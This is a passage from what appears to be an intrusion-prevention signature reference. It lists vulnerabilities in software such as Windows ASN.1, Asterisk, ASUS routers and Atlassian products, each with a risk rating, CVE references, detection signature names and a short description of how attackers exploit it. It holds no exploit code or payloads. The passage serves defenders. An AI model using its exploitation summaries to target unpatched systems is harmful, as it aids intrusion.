Windows NT 4.0; Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

ASN.1 library weakness could lead to remote system compromise with SYSTEM privileges using one of the multiple integer overflow vulnerabilities.

Situation:

HTTP_CSH-Asn-1-Bitstring-Overflow-MS04-007

References:

CVE-2005-1935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1935

MS04-007
http://technet.microsoft.com/security/bulletin/MS04-007

Asn-1-Integer-BOF-MS04-007

About this vulnerability:

Remote system compromise using ASN.1 library weakness (MS04-007)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Integer Overflow

Description:

ASN.1 library weakness could lead to remote system compromise with SYSTEM privileges using one of the multiple integer overflow vulnerabilities.

Situation:

ASN.1_Invalid-Bitstring
ASN.1_Oversize-Block
HTTP_CS-Asn-1-Integer-BOF-MS04-007
HTTP_CS-Suspicious-HTTP-Authorization-Negotiate-Token
SMTP_CCS-Asn-1-Integer-BOF-MS04-007
HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007-2

References:

CVE-2003-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0818

BID-9635
http://www.securityfocus.com/bid/9635

MS04-007
http://technet.microsoft.com/security/bulletin/MS04-007

ASP.NET-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft ASP.NET

Risk:

High

First detected in:

sgpkg-ips-638-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft ASP.NET

Type:

Misconfiguration

Description:

An information disclosure vulnerability exists in Microsoft ASP .NET. The vulnerability is due to the inclusion of configuration file contents in error pages under certain circumstances. A remote, unauthenticated attacker can exploit this vulnerability by sending a request crafted to elicit an error message from the server. Successful exploitation of this vulnerability would expose contents of a web configuration file to the attacker in the resulting error message.

Situation:

HTTP_CSU-ASP.NET-Information-Disclosure-Vulnerability-CVE-2015-1648

References:

CVE-2015-1648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1648

MS15-041
http://technet.microsoft.com/security/bulletin/MS15-041

Asterisk-AMI-Originate-Authenticated-RCE

About this vulnerability:

A vulnerability in Asterisk

Risk:

High

First detected in:

sgpkg-ips-1806-5242

Last changed:

sgpkg-ips-1806-5242

Platform:

Unix

Software:

Asterisk

Type:

Input Validation

Description:

A vulnerability in Asterisk, versions before 18.24.2, 20.9.2, and 21.4.2 and certified-asterisk, which allows remote attackers to change all configuration files in the '/etc/asterisk/' directory.

Situation:

Generic_CS-Asterisk-AMI-Originate-Authenticated-RCE

References:

CVE-2024-42365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42365

Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1019-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

An insufficient length check causes a buffer overflow vulnerability in Digium Asterisk. A successful exploitation allows an attacker to run arbitrary code in the system with the privileges of the daemon.

Situation:

SIP_Digium-Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow

References:

CVE-2017-16671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16671

Asterisk-Management-Interface-HTTP-Digest-Authentication-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Digium Asterisk Open Source
Risk:	Moderate
First detected in:	sgpkg-ips-445-4219
Last changed:	sgpkg-ips-1588-5242
Platform:	Generic
Software:	Digium Asterisk
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Digium Asterisk. The vulnerability is due to a bounds checking error while handling HTTP Digest Authentication headers in the ast_parse_digest() function used by the Asterisk management interface. A remote, unauthenticated attacker can exploit this vulnerability to overflow a stack-based buffer and possibly execute arbitrary code in the context of the vulnerable application. An unsuccessful exploit attempt may lead to a denial-of-service condition.
Situation:	HTTP_CSH-Asterisk-Management-Interface-Digest-Authentication-Stack-BOF

Asterisk-pjsip-Endpoint-Presence-Disclosure

About this vulnerability:

A vulnerability in Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk Open Source; Digium Certified Asterisk

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Asterisk. The vulnerability is due to improper responses when blocking SIP requests if the target system is configured with endpoint-specific ACL rules. An attacker can exploit this vulnerability by sending SIP requests to the target system. Successful exploitation could result in the endpoint presence disclosure to the remote user.

Situation:

SIP-UDP_Asterisk-pjsip-Endpoint-Presence-Disclosure

References:

CVE-2018-12227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12227

Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service

About this vulnerability:

A vulnerability in Asterisk Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1077-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

There has been reported a denial-of-service vulnerability in Asterisk PJSIP. A remote attacker can exploit this vulnerability by sending a crafted SDP message to the target server. Successful exploitation can lead to denial-of-service conditions.

Situation:

SIP_Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service

References:

CVE-2018-1000099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000099

Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service

About this vulnerability:

A vulnerability in Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

A denial of service vulnerability exists in Asterisk Open Source. The vulnerability exists in the res_pjsip_pubsub module. The vulnerability is due to the way SIP SUBSCRIBE requests with unexpected mixes of headers for a given event package are handled. Remote, unauthenticated attackers could exploit this vulnerability by sending malformed SIP SUBSCRIBE requests to the vulnerable server. Successful exploitation would result in a denial of service condition.

Situation:

SIP-UDP_Digium-Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service

References:

CVE-2014-6609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6609

OSVDB-111730
http://www.osvdb.org/111730

Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Digium Asterisk

Risk:

High

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

There is a denial of service in the Asterisk IPBX SIP channel driver that can be triggered by sending a SIP BYE message with an "Also" header.

Situation:

SIP-UDP_Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service

References:

BID-27110
http://www.securityfocus.com/bid/27110

Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service

About this vulnerability:

A denial of service vulnerability in Digium Asterisk

Risk:

High

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

There is a denial of service in the Asterisk voice over IP telephone system that can be triggered by sending a crafted SIP INVITE request with malformed SDP data.

Situation:

SIP-UDP_Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service

References:

CVE-2007-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1561

BID-23031
http://www.securityfocus.com/bid/23031

OSVDB-34479
http://www.osvdb.org/34479

Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability

About this vulnerability:

A vulnerability in Asterisk

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

The Skinny channel driver (chan_skinny) in Asterisk Open Source before 1.4.10, AsteriskNOW before beta7, Appliance Developer Kit before 0.7.0, and Appliance s800i before 1.0.3 allows remote authenticated users to cause a denial of service (application crash) via a CAPABILITIES_RES_MESSAGE packet with a capabilities count larger than the capabilities_res_message array population.

Situation:

Generic_CS-Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability

References:

CVE-2007-4280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4280

BID-25228
http://www.securityfocus.com/bid/25228

Asterisk-Skinny-Channel-Get-Input-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in the Skinny channel driver in Asterisk

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

Asterisks Skinny channel driver has a vulnerability in input validation. A Skinny protocol message with an invalid size field can be used to cause a buffer overflow and to execute arbitrary code on the target system. The vulnerability can be triggered before authentication.

Situation:

Generic_CS-Asterisk-Skinny-Channel-Get-Input-Integer-Overflow

References:

CVE-2006-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5444

BID-20617
http://www.securityfocus.com/bid/20617

OSVDB-29972
http://www.osvdb.org/29972

Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service

About this vulnerability:

A vulnerability in Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk Open Source

Type:

Infinite Loop

Description:

A denial-of-service vulnerability has been reported in Asterisk. The vulnerability is due to improper handling of client abrupt disconnection or client-supplied messages when client is connecting via TLS. A remote user can exploit the vulnerability by abruptly disconnecting or sending specially crafted data via TLS to cause target system entering infinite loop. Successful exploitation can result in denial-of-service conditions.

Situation:

HTTP_CS-Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service

References:

CVE-2018-12228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12228

Astium-Remote-Code-Execution

About this vulnerability:

An Astium Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Astium

Type:

PHP Injection

Description:

A vulnerability in Astium, versions 2.1-25399 and before, that allows remote attackers to gain admin access through SQL injections, and upload and execute arbitrary PHP code.

Situation:

File-Text_Astium-Remote-Code-Execution

References:

OSVDB-88860
http://www.osvdb.org/88860

Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow

About this vulnerability:

A vulnerability in Astonsoft DeepBurner

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Astonsoft DeepBurner

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Astonsoft Deepburner. The application fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.

Situation:

HTTP_SS-Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
File-TextId_Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow

References:

CVE-2006-6665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6665

BID-21657
http://www.securityfocus.com/bid/21657

OSVDB-32356
http://www.osvdb.org/32356

Asus-Net4Switch-ActiveX-Buffer-Overflow

About this vulnerability:

An ASUS Net4Switch ActiveX Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

ASUS Net4Switch

Type:

Buffer Overflow

Description:

A vulnerability in ASUS Net4Switch, version 1.0.0020, which allows remote attackers to execute arbitrary code via a long Alert method parameter.

Situation:

File-Text_JavaScript-ShellCode-Generation

References:

CVE-2012-4924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4924

OSVDB-79438
http://www.osvdb.org/79438

Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in ASUS Net4Switch ipswcom.dll

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ASUS Net4Switch

Type:

Buffer Overflow

Description:

There exists a vulnerability in ASUS Net4Switch. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow

References:

BID-52110
http://www.securityfocus.com/bid/52110

OSVDB-79438
http://www.osvdb.org/79438

Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow

About this vulnerability:

Asus Remote Console DPC Proxy server 2.0.0.19 and 2.0.0.24 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DPC Proxy Server

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Asus Remote Console DPC Proxy server 2.0.0.19 and 2.0.0.24, which allows attackers to remotly execute arbitrary code via a long string.

Situation:

Generic_CS-Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow

References:

CVE-2008-1491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1491

BID-28394
http://www.securityfocus.com/bid/28394

OSVDB-43638
http://www.osvdb.org/43638

Asus-RT-AC3200-Command-Injection

About this vulnerability:

A vulnerability in Asus RT AC3200

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

ASUS RT

Type:

Input Validation

Description:

A system command injection vulnerability has been reported in appGet.cgi on ASUS RT-AC3200.

Situation:

HTTP_CRL-Asus-RT-AC3200-Command-Injection

References:

CVE-2018-14714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14714

Asus-RT-N56U-Remote-Password-Disclosure

About this vulnerability:	Asus-RT-N56U fw version 1.0.1.4 and older remote password disclosure vulnerability
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows; Linux
Software:	ASUS RT
Type:	Input Validation
Description:	A validation vulnerability in ASUS-RT-N56U that allows an attacker on the same network to retrieve a web page containing device configuration and the devices administrator password without having proper login credentials.
Situation:	HTTP_CSU-Asus-RT-N56U-Remote-Password-Disclosure

AsusWRT-Lan-Unauthenticated-Remote-Code-Execution

About this vulnerability:

An AsusWRT LAN Unauthenticated Remote Code Execution Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AsusWRT

Type:

Input Validation

Description:

A vulnerability in AsusWRT, version 3.0.0.4.380.7743, which allows remote attackers to enable a special comand mode via a POST to port 80, which then may allow direct command execution via UDP packets to port 9999.

Situation:

HTTP_CS-AsusWRT-Lan-Unauthenticated-Remote-Code-Execution

References:

CVE-2018-5999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999

AsyncRAT-Infection-Traffic

About this vulnerability:	AsyncRAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1361-5242
Last changed:	sgpkg-ips-1361-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	AsyncRAT infection traffic was detected.
Situation:	TLS_SS-AsyncRAT-Infection-Traffic

Atftp-TFTP-Server-Error-Packet-DoS

About this vulnerability:

A vulnerability in atftp TFTP Server

Risk:

High

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

atftpd

Type:

Integer Overflow

Description:

A vulnerability in atftp TFTP server, version 0.7.1, which allows remote attackers to cause a denial of service condition by sending a specially crafted error packet to the target server, due to improper validation of the length of the error packet before performing strncpy() call.

Situation:

Generic_UDP-Atftp-TFTP-Server-Error-Packet-DoS
TFTP_CS-Atftp-TFTP-Server-Error-Packet-DoS

References:

CVE-2019-11365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11365

AtHoc-IWSAlerts-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability:	A vulnerability in AtHoc IWSAlerts ActiveX Control
Risk:	High
First detected in:	sgpkg-ips-261-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	AtHoc IWSAlerts
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in the AtHoc IWSAlerts ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of the CompleteInstallation() method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.
Situation:	HTTP_SS-AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow File-Text_AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow

Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection

About this vulnerability:

A vulnerability in Atlassian Bitbucket Server

Risk:

High

First detected in:

sgpkg-ips-1507-5242

Last changed:

sgpkg-ips-1507-5242

Platform:

Generic

Software:

Atlassian Bitbucket

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Atlassian Bitbucket Server and Data Center. The vulnerability is due to improper validation of certain user input fields. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the affected system. Successful exploitation of the vulnerability could lead to arbitrary command execution under the security context of the service.

Situation:

HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection

References:

CVE-2022-36804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804

Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection

About this vulnerability:

A vulnerability in Atlassian Bitbucket Server and Data Center

Risk:

Moderate

First detected in:

sgpkg-ips-1537-5242

Last changed:

sgpkg-ips-1537-5242

Platform:

Generic

Software:

Atlassian Bitbucket

Type:

Input Validation

Description:

Improper validation of usernames on the server causes a command injection vulnerability in Atlassian Bitbucket. A successful exploit allows an attacker to execute arbitrary commands with the privileges of the vulnerable application.

Situation:

HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection

References:

CVE-2022-43781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43781

Atlassian-Companion-Remote-Code-Execution-CVE-2023-22524

About this vulnerability:

An attempt to exploit a vulnerability in macOS detected

Risk:

High

First detected in:

sgpkg-ips-1667-5242

Last changed:

sgpkg-ips-1667-5242

Platform:

Mac OS X

Software:

Atlassian Companion

Type:

Input Validation

Description:

Atlassian Companion application for MacOS prior to version 2.0.0 was affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion's blocklist and macOS Gatekeeper to allow execution of code.

Situation:

File-Text_Atlassian-Companion-Suspicious-Script
File-TextId_MacOS-Suspicious-Shortcut-File

References:

CVE-2023-22524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22524

Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Confluence Data Center and Server detected

Risk:

High

First detected in:

sgpkg-ips-1746-5242

Last changed:

sgpkg-ips-1746-5242

Platform:

Linux; Windows

Software:

Atlassian Confluence

Type:

Input Validation

Description:

A vulnerability in Confluence Data Center and Server, multiple versions, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to improper validation of incoming requests.

Situation:

HTTP_CS-Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE

References:

CVE-2024-21683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21683

Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure

About this vulnerability:

A vulnerability in Atlassian Confluence Server

Risk:

Moderate

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Atlassian Confluence Server. Successful exploitation could lead in local file disclosure.

Situation:

HTTP_CLR-Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure

References:

CVE-2019-3394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3394

Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure

About this vulnerability:

A vulnerability in Atlassian Confluence Server

Risk:

Moderate

First detected in:

sgpkg-ips-1397-5242

Last changed:

sgpkg-ips-1397-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

Improper validation of paths causes an information disclosure vulnerability in Atlassian Confluence. A successful exploitation can result in local file disclosure.

Situation:

HTTP_CSU-Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure

References:

CVE-2021-26085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26085

Atlassian-Crowd-pdkinstall-CVE-2019-11580

About this vulnerability:

A vulnerability in Atlassian Crowd

Risk:

High

First detected in:

sgpkg-ips-1306-5242

Last changed:

sgpkg-ips-1306-5242

Platform:

Generic

Software:

Atlassian Crowd

Type:

Insecure Configuration

Description:

Atlassian Crowd and Crowd Data Center release builds had incorrectly enabled the pdkinstall development plugin. A successful exploitation of this vulnerability may allow arbitrary plugin installation, which may permit remote code execution on vulnerable versions of Atlassian Crowd and Crowd Data Center.

Situation:

HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-2
HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-1

References:

CVE-2019-11580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11580

Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure

About this vulnerability:

A vulnerability in Atlassian Crucible

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Atlassian Crucible; Atlassian FishEye

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Atlassian FishEye and Crucible. A remote attacker can use this to disclose sensitive information.

Situation:

HTTP_CSU-Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure

References:

CVE-2017-9512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9512

Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization

About this vulnerability:

A vulnerability in Atlassian JIRA and Service Management.

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

A vulnerability in Atlassian JIRA and Service Management, multiple versions, which allows remote attackers to execute arbitrary code by sending maliciously crafted serialized parameters to the target application via an RMI call, due to lack of input validation.

Situation:

Generic_CS-Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization

References:

CVE-2020-36239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36239

Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

A server-side template injection vulnerability has been reported for Atlassian Jira Server and Date Center. This vulnerability is due to insufficient blacklist of allowed classes available to the Velocity template engine. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution.

Situation:

File-Text_Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection

References:

CVE-2022-36799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36799

Atlassian-JIRA-Issue-Collector-Directory-Traversal

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

High

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

A directory traversal vulnerability exists in Atlassian JIRA. The vulnerability is due to lack of input validation when processing user supplied data. A remote unauthorized user can attack the service by sending crafted HTTP requests. Successful exploitation could lead to command injection and execution in security context of the JIRA service, which is SYSTEM by default.

Situation:

HTTP_CS-Atlassian-JIRA-Issue-Collector-Directory-Traversal

References:

CVE-2014-2314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2314

BID-65849
http://www.securityfocus.com/bid/65849

OSVDB-103807
http://www.osvdb.org/103807

Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-XSS

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

Improper validation of error messages causes a reflected cross-site scripting vulnerability in Atlassian JIRA. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-Cross-Site-Scripting

References:

CVE-2021-43942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43942

Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

High

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Directory Traversal

Description:

A path traversal vulnerability in Atlassian Jira Server and Data Center allows unauthenticated read access to a specific set of configuration files.

Situation:

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086

References:

CVE-2021-26086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26086

Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

Moderate

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

Improper input validation causes a server-side request forgery vulnerability in Atlassian Jira. A successful exploit allows an attacker to access information on the target.

Situation:

HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery

References:

CVE-2022-26135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26135

Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

Moderate

First detected in:

sgpkg-ips-1498-5242

Last changed:

sgpkg-ips-1498-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

Insufficient sanitization of the planUrl parameter in HTTP requests to the TeamManagement.jspa endpoint causes a cross-site scripting vulnerability in Atlassian Jira. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting

References:

CVE-2022-36801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36801

Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

High

First detected in:

sgpkg-ips-1300-5242

Last changed:

sgpkg-ips-1300-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Atlassian Jira Server and Data Center. The vulnerability is due to insufficient validation of permissions in the ViewUserHover action. An unauthenticated, remote attacker can exploit this vulnerability by sending a specific request to the target server. A successful attack discloses the existence of usernames on the Jira instance.

Situation:

HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure

References:

CVE-2020-14181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181

Atlassian-JIRA-Template-Injection-CVE-2019-11581

About this vulnerability:

A vulnerability in Atlassian JIRA

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Atlassian JIRA

Type:

Input Validation

Description:

Improper validation of form input causes a template injection vulnerability in Atlassian JIRA. A successful exploit allows an attacker to execute arbitrery code with the privileges of the service.

Situation:

HTTP_CS-Atlassian-JIRA-Template-Injection-CVE-2019-11581

References:

CVE-2019-11581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11581

Atlassian-Remote-File-Access

About this vulnerability:

An Atlassian Remote File Access vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-708-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Atlassian

Type:

Insecure Configuration

Description:

A vulnerability in various versions of Atlassian products which allows remote attackers to read remote files from the server due to the way Atlassian handles XML files, specifically with the expansion of external entities with the SYSTEM identifier.

Situation:

HTTP_CRL-Atlassian-Remote-File-Access

References:

CVE-2012-2926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2926

BID-53595
http://www.securityfocus.com/bid/53595

OSVDB-82274
http://www.osvdb.org/82274

Atmosphere-Framework-Reflected-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Atmosphere Framework
Risk:	Moderate
First detected in:	sgpkg-ips-1381-5242
Last changed:	sgpkg-ips-1381-5242
Platform:	Generic
Software:	Atmosphere Framework
Type:	Input Validation
Description:	A reflected cross-site scripting vulnerability has been reported in the Atmosphere framework. Successful exploitation of this vulnerability could result in the execution of script code in security context of the target user's browser.
Situation:	HTTP_CRL-Atmosphere-Framework-Reflected-Cross-Site-Scripting

Atrium-Software-Mercur-IMAPD-Subscribe-Command-Buffer-Overflow

About this vulnerability:

A stack-based buffer overflow vulnerability in Atrium Software MERCUR IMAP service.

Risk:

High

First detected in:

